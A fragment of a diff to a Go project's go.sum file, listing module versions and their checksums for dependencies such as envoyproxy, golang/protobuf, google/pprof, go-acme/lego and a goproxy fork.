github.com/coreos/pkg v0.0.0-20180928190104-399ea9e2e55f/go.mod h1:E3G3o1h8I7cfcXa63jLwjI0eiQQMgzzUDFVpN/nH/eA=
|
||||
github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc=
|
||||
github.com/cncf/udpa/go v0.0.0-20200629203442-efcf912fb354/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk=
|
||||
github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk=
|
||||
github.com/cpu/goacmedns v0.0.1/go.mod h1:sesf/pNnCYwUevQEQfEwY0Y3DydlQWSGZbaMElOWxok=
|
||||
github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsrgA7czyZG/E6dU=
|
||||
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
|
||||
@@ -57,28 +92,35 @@ github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c
|
||||
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
|
||||
github.com/decker502/dnspod-go v0.2.0/go.mod h1:qsurYu1FgxcDwfSwXJdLt4kRsBLZeosEb9uq4Sy+08g=
|
||||
github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
|
||||
github.com/dgryski/go-sip13 v0.0.0-20181026042036-e10d5fee7954/go.mod h1:vAd38F8PWV+bWy6jNmig1y/TA+kYO4g3RSRF0IAv0no=
|
||||
github.com/dimchansky/utfbom v1.1.0/go.mod h1:rO41eb7gLfo8SF1jd9F8HplJm1Fewwi4mQvIirEdv+8=
|
||||
github.com/dnaeon/go-vcr v0.0.0-20180814043457-aafff18a5cc2/go.mod h1:aBB1+wY4s93YsC3HHjMBMrwTj2R9FHDzUr9KyGc8n1E=
|
||||
github.com/dnsimple/dnsimple-go v0.30.0/go.mod h1:O5TJ0/U6r7AfT8niYNlmohpLbCSG+c71tQlGr9SeGrg=
|
||||
github.com/eapache/go-resiliency v1.1.0/go.mod h1:kFI+JgMyC7bLPUVY133qvEBtVayf5mFgVsvEsIPBvNs=
|
||||
github.com/eapache/go-xerial-snappy v0.0.0-20180814174437-776d5712da21/go.mod h1:+020luEh2TKB4/GOp8oxxtq0Daoen/Cii55CzbTV6DU=
|
||||
github.com/eapache/queue v1.1.0/go.mod h1:6eCeP0CKFpHLu8blIFXhExK/dRa7WDZfr6jVFPTqq+I=
|
||||
github.com/elazarl/goproxy v0.0.0-20190911111923-ecfe977594f1 h1:yY9rWGoXv1U5pl4gxqlULARMQD7x0QG85lqEXTWysik=
|
||||
github.com/elazarl/goproxy v0.0.0-20190911111923-ecfe977594f1/go.mod h1:Ro8st/ElPeALwNFlcTpWmkr6IoMFfkjXAvTHpevnDsM=
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2 h1:dWB6v3RcOy03t/bUadywsbyrQwCqZeNIEX6M1OtSZOM=
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2/go.mod h1:gNh8nYJoAm43RfaxurUnxr+N1PwuFV3ZMl/efxlIlY8=
|
||||
github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
|
||||
github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
|
||||
github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98=
|
||||
github.com/envoyproxy/go-control-plane v0.9.7/go.mod h1:cwu0lG7PUMfa9snN8LXBig5ynNVH9qI8YYLbd1fK2po=
|
||||
github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk=
|
||||
github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c=
|
||||
github.com/exoscale/egoscale v0.18.1/go.mod h1:Z7OOdzzTOz1Q1PjQXumlz9Wn/CddH0zSYdCF3rnBKXE=
|
||||
github.com/fatih/color v1.7.0 h1:DkWD4oS2D8LGGgTQ6IvwJJXSL5Vp2ffcQg58nFV38Ys=
|
||||
github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
|
||||
github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w=
|
||||
github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk=
|
||||
github.com/fatih/structs v1.1.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M=
|
||||
github.com/fsnotify/fsnotify v1.4.7 h1:IXs+QLmnXW2CcXuY+8Mzv/fWEsPGWxqefPtCP5CnV9I=
|
||||
github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
|
||||
github.com/fsnotify/fsnotify v1.5.1 h1:mZcQUHVQUQWoPXXtuf9yuEXKudkV2sx1E06UadKWpgI=
|
||||
github.com/fsnotify/fsnotify v1.5.1/go.mod h1:T3375wBYaZdLLcVNkcVbzGHY7f1l/uK5T5Ai1i3InKU=
|
||||
github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
|
||||
github.com/go-acme/lego/v3 v3.1.0 h1:yanYFoYW8azFkCvJfIk7edWWfjkYkhDxe45ZsxoW4Xk=
|
||||
github.com/go-acme/lego/v3 v3.1.0/go.mod h1:074uqt+JS6plx+c9Xaiz6+L+GBb+7itGtzfcDM2AhEE=
|
||||
github.com/go-cmd/cmd v1.0.5/go.mod h1:y8q8qlK5wQibcw63djSl/ntiHUHXHGdCkPk0j4QeW4s=
|
||||
github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q=
|
||||
github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU=
|
||||
github.com/go-gl/glfw/v3.3/glfw v0.0.0-20191125211704-12ad95a8df72/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8=
|
||||
github.com/go-gl/glfw/v3.3/glfw v0.0.0-20200222043503-6f7a984d4dc4/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8=
|
||||
github.com/go-ini/ini v1.44.0/go.mod h1:ByCAeIL28uOIIG0E3PJtZPDL8WnHpFKFOtgjp+3Ies8=
|
||||
github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as=
|
||||
github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE=
|
||||
@@ -87,40 +129,72 @@ github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/me
|
||||
github.com/gofrs/uuid v3.2.0+incompatible/go.mod h1:b2aQJv3Z4Fp6yNu3cdSllBxTCLRxnplIgP/c0N/04lM=
|
||||
github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
|
||||
github.com/gogo/protobuf v1.2.0/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
|
||||
github.com/gogo/protobuf v1.2.1/go.mod h1:hp+jE20tsWTFYpLwKvXlhS1hjn+gTNwPg2I6zVXpSg4=
|
||||
github.com/goji/httpauth v0.0.0-20160601135302-2da839ab0f4d/go.mod h1:nnjvkQ9ptGaCkuDUx6wNykzzlUixGxvkme+H/lnzb+A=
|
||||
github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
|
||||
github.com/golang/groupcache v0.0.0-20190129154638-5b532d6fd5ef/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/groupcache v0.0.0-20191227052852-215e87163ea7/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
|
||||
github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
|
||||
github.com/golang/mock v1.3.1/go.mod h1:sBzyDLLjw3U8JLTeZvSv8jJB+tU5PVekmnlKIyFUx0Y=
|
||||
github.com/golang/mock v1.4.0/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw=
|
||||
github.com/golang/mock v1.4.1/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw=
|
||||
github.com/golang/mock v1.4.3/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw=
|
||||
github.com/golang/mock v1.4.4/go.mod h1:l3mdAwkq5BuhzHwde/uurv3sEJeZMXNpwsxVWU71h+4=
|
||||
github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.3.2 h1:6nsPYzhq5kReh6QImI3k5qWzO4PEbvbIW2cwSfR/6xs=
|
||||
github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
|
||||
github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
|
||||
github.com/golang/protobuf v1.3.5/go.mod h1:6O5/vntMXwX2lRkT1hjjk0nAC1IDOTvTlVgjlRvqsdk=
|
||||
github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8=
|
||||
github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA=
|
||||
github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs=
|
||||
github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w=
|
||||
github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0=
|
||||
github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8=
|
||||
github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI=
|
||||
github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI=
|
||||
github.com/golang/snappy v0.0.0-20180518054509-2e65f85255db/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
|
||||
github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
|
||||
github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
|
||||
github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
|
||||
github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
|
||||
github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
|
||||
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.4.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck=
|
||||
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
|
||||
github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs=
|
||||
github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0=
|
||||
github.com/google/martian/v3 v3.1.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0=
|
||||
github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc=
|
||||
github.com/google/pprof v0.0.0-20190515194954-54271f7e092f/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc=
|
||||
github.com/google/pprof v0.0.0-20191218002539-d4f498aebedc/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200212024743-f11f1df84d12/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200229191704-1ebb73c60ed3/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200430221834-fc25d7d30c6d/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200708004538-1a94d8640e99/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20201023163331-3e6fc7fc9c4c/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
|
||||
github.com/google/pprof v0.0.0-20201203190320-1bf35d6f28c2/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
|
||||
github.com/google/pprof v0.0.0-20201218002935-b9804c9f04c2/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
|
||||
github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI=
|
||||
github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
||||
github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
||||
github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg=
|
||||
github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk=
|
||||
github.com/googleapis/google-cloud-go-testing v0.0.0-20200911160855-bcd43fbb19e8/go.mod h1:dvDLG8qkwmyD9a/MJJN3XJcT3xFxOKAvTZGvuZmac9g=
|
||||
github.com/gophercloud/gophercloud v0.3.0/go.mod h1:vxM41WHh5uqHVBMZHzuwNOHh8XEoIEcSTewFxm1c5g8=
|
||||
github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY=
|
||||
github.com/gorilla/context v1.1.1/go.mod h1:kBGZzfjB9CEq2AlWe17Uuf7NDRt0dE0s8S51q0aT7Yg=
|
||||
github.com/gorilla/mux v1.6.2 h1:Pgr17XVTNXAk3q/r4CpKzC5xBM/qW1uVLV+IhRZpIIk=
|
||||
github.com/gorilla/mux v1.6.2/go.mod h1:1lud6UwP+6orDFRuTfBEV8e9/aOM/c4fVVCaMa2zaAs=
|
||||
github.com/gorilla/mux v1.7.3 h1:gnP5JzjVOuiZD07fKKToCAOjS0yOpj/qPETTXCCS6hw=
|
||||
github.com/gorilla/mux v1.7.3/go.mod h1:1lud6UwP+6orDFRuTfBEV8e9/aOM/c4fVVCaMa2zaAs=
|
||||
github.com/gorilla/websocket v1.4.0/go.mod h1:E7qHFY5m1UJ88s3WnNqhKjPHQ0heANvMoAMk2YaljkQ=
|
||||
github.com/grpc-ecosystem/go-grpc-middleware v1.0.0/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs=
|
||||
github.com/grpc-ecosystem/go-grpc-prometheus v1.2.0/go.mod h1:8NvIoxWQoOIhqOTXgfV/d3M/q6VIi02HzZEHgUlZvzk=
|
||||
github.com/grpc-ecosystem/grpc-gateway v1.8.5/go.mod h1:vNeuVxBJEsws4ogUvrchl83t/GYV9WGTSLVdBhOQFDY=
|
||||
github.com/grpc-ecosystem/grpc-gateway v1.9.0/go.mod h1:vNeuVxBJEsws4ogUvrchl83t/GYV9WGTSLVdBhOQFDY=
|
||||
github.com/h2non/parth v0.0.0-20190131123155-b4df798d6542/go.mod h1:Ow0tF8D4Kplbc8s8sSb3V2oUCygFHVp8gC3Dn6U4MNI=
|
||||
github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
@@ -128,22 +202,28 @@ github.com/hashicorp/golang-lru v0.5.3/go.mod h1:iADmTwqILo4mZ8BN3D2Q6+9jd8WM5uG
|
||||
github.com/hashicorp/hcl v1.0.0 h1:0Anlzjpi4vEasTeNFn2mLJgTSwt0+6sfsiTG8qcWGx4=
|
||||
github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ=
|
||||
github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
|
||||
github.com/ianlancetaylor/demangle v0.0.0-20181102032728-5e5cf60278f6/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc=
|
||||
github.com/ianlancetaylor/demangle v0.0.0-20200824232613-28f6c0f3b639/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc=
|
||||
github.com/iij/doapi v0.0.0-20190504054126-0bbf12d6d7df/go.mod h1:QMZY7/J/KSQEhKWFeDesPjMj+wCHReeknARU3wqlyN4=
|
||||
github.com/inconshreveable/go-vhost v0.0.0-20160627193104-06d84117953b h1:IpLPmn6Re21F0MaV6Zsc5RdSE6KuoFpWmHiUSEs3PrE=
|
||||
github.com/inconshreveable/go-vhost v0.0.0-20160627193104-06d84117953b/go.mod h1:aA6DnFhALT3zH0y+A39we+zbrdMC2N0X/q21e6FI0LU=
|
||||
github.com/jmespath/go-jmespath v0.0.0-20180206201540-c2b33e8439af/go.mod h1:Nht3zPeWKUH0NzdCt2Blrr5ys8VGpn0CEB0cQHVjt7k=
|
||||
github.com/jonboulle/clockwork v0.1.0/go.mod h1:Ii8DK3G1RaLaWxj9trq07+26W01tbo22gdxWY5EU2bo=
|
||||
github.com/json-iterator/go v1.1.5/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
|
||||
github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
|
||||
github.com/json-iterator/go v1.1.7/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
|
||||
github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU=
|
||||
github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/XSXhF0NWZEnDohbsk=
|
||||
github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU=
|
||||
github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w=
|
||||
github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q=
|
||||
github.com/kgretzky/goproxy v0.0.0-20220622134552-7d0e0c658440 h1:2B7/pxomcOdEXRg1b40AkROGPkSn+uu31aAgoeKQtlQ=
|
||||
github.com/kgretzky/goproxy v0.0.0-20220622134552-7d0e0c658440/go.mod h1:Ro8st/ElPeALwNFlcTpWmkr6IoMFfkjXAvTHpevnDsM=
|
||||
github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
|
||||
github.com/klauspost/cpuid/v2 v2.1.0 h1:eyi1Ad2aNJMW95zcSbmGg7Cg6cq3ADwLpMAP96d8rF0=
|
||||
github.com/klauspost/cpuid/v2 v2.1.0/go.mod h1:RVVoqg1df56z8g3pUjL/3lE5UfnlrJX8tyFgg4nqhuY=
|
||||
github.com/kolo/xmlrpc v0.0.0-20190717152603-07c4ee3fd181/go.mod h1:o03bZfuBwAXHetKXuInt4S7omeXUu62/A845kiycsSQ=
|
||||
github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
|
||||
github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
|
||||
github.com/kr/fs v0.1.0/go.mod h1:FFnZGqtBN9Gxj7eW1uZ42v5BccTP0vu6NEaFoC2HwRg=
|
||||
github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc=
|
||||
github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI=
|
||||
github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
|
||||
@@ -152,27 +232,33 @@ github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=
|
||||
github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
|
||||
github.com/labbsr0x/bindman-dns-webhook v1.0.2/go.mod h1:p6b+VCXIR8NYKpDr8/dg1HKfQoRHCdcsROXKvmoehKA=
|
||||
github.com/labbsr0x/goh v1.0.1/go.mod h1:8K2UhVoaWXcCU7Lxoa2omWnC8gyW8px7/lmO61c027w=
|
||||
github.com/libdns/libdns v0.2.1 h1:Wu59T7wSHRgtA0cfxC+n1c/e+O3upJGWytknkmFEDis=
|
||||
github.com/libdns/libdns v0.2.1/go.mod h1:yQCXzk1lEZmmCPa857bnk4TsOiqYasqpyOEeSObbb40=
|
||||
github.com/linode/linodego v0.10.0/go.mod h1:cziNP7pbvE3mXIPneHj0oRY8L1WtGEIKlZ8LANE4eXA=
|
||||
github.com/liquidweb/liquidweb-go v1.6.0/go.mod h1:UDcVnAMDkZxpw4Y7NOHkqoeiGacVLEIG/i5J9cyixzQ=
|
||||
github.com/magiconair/properties v1.8.0 h1:LLgXmsheXeRoUOBOjtwPQCWIYqM/LU1ayDtDePerRcY=
|
||||
github.com/magiconair/properties v1.8.0/go.mod h1:PppfXfuXeibc/6YijjN8zIbojt8czPbwD3XqdrwzmxQ=
|
||||
github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
|
||||
github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
|
||||
github.com/mattn/go-isatty v0.0.3 h1:ns/ykhmWi7G9O+8a448SecJU3nSMBXJfqQkl0upE1jI=
|
||||
github.com/magiconair/properties v1.8.6 h1:5ibWZ6iY0NctNGWo87LalDlEZ6R41TqbbDamhfG/Qzo=
|
||||
github.com/magiconair/properties v1.8.6/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPKd5NZ3oSwXrF60=
|
||||
github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
|
||||
github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40=
|
||||
github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4=
|
||||
github.com/mattn/go-isatty v0.0.3/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4=
|
||||
github.com/mattn/go-isatty v0.0.8 h1:HLtExJ+uU2HOZ+wI0Tt5DtUDrx8yhUqDcp7fYERX4CE=
|
||||
github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
|
||||
github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
|
||||
github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y=
|
||||
github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94=
|
||||
github.com/mattn/go-runewidth v0.0.2/go.mod h1:LwmH8dsx7+W8Uxz3IHJYH5QSwggIsqBzpuz5H//U1FU=
|
||||
github.com/mattn/go-runewidth v0.0.4/go.mod h1:LwmH8dsx7+W8Uxz3IHJYH5QSwggIsqBzpuz5H//U1FU=
|
||||
github.com/mattn/go-tty v0.0.0-20180219170247-931426f7535a/go.mod h1:XPvLUNfbS4fJH25nqRHfWLMa1ONC8Amw+mIA639KxkE=
|
||||
github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0=
|
||||
